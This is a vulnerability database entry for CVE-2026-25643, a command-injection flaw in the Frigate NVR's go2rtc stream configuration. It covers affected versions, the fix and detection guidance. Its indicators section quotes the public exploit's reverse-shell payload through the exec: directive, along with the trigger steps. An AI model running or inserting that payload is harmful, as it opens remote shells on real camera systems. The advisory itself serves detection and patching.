cbcvebase.
CVE-2026-25643
published 2026-02-06

CVE-2026-25643: Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE)…

PriorityP267critical9.1CVSS 3.1
AVNACLPRHUINSCCHIHAH
EXPLOIT
EPSS
2.87%
85.1th percentile
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive. The go2rtc service executes these commands without restrictions. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control. This vulnerability is fixed in 0.16.4.

Affected

2 ranges
VendorProductVersion rangeFixed in
blakeblackshearfrigate< 0.16.40.16.4
frigatefrigate< 0.16.40.16.4

Detection & IOCsextracted from sources · hover to see the quote

commandexec:bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
othergo2rtc stream name: cve_poc
othercamera name: cve_trigger
urlrtsp://127.0.0.1:8554/cve_poc
  • Monitor Frigate config.yaml (or API config PUT/POST requests) for the presence of the 'exec:' directive inside go2rtc streams, which is the injection vector for this RCE.
  • Alert on go2rtc spawning child processes (e.g. bash, sh) with network redirection arguments such as /dev/tcp/, which indicates active exploitation of the exec: directive.
  • Detect creation of a camera named 'cve_trigger' or a go2rtc stream named 'cve_poc' in the Frigate configuration, as these are the artifact names used by the public exploit.
  • Watch for Frigate config API calls that inject a camera whose ffmpeg input path points to rtsp://127.0.0.1:8554/<stream> where the stream name matches a go2rtc exec: entry — this is the trigger mechanism used to force command execution.
  • Monitor for outbound TCP connections from the go2rtc or Frigate process to unexpected external IPs/ports, consistent with a reverse shell established after exploitation.
  • ·This vulnerability is only exploitable by an authenticated administrator OR by anyone if the Frigate instance is exposed to the internet without authentication. Unauthenticated internet-exposed instances are at highest risk.
  • ·The exploit targets Frigate versions prior to 0.16.4. The fix is version 0.16.4; ensure the patched version is deployed.
  • ·The go2rtc service executes injected commands without any restrictions, meaning there is no secondary sandbox or privilege boundary to rely on for mitigation.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.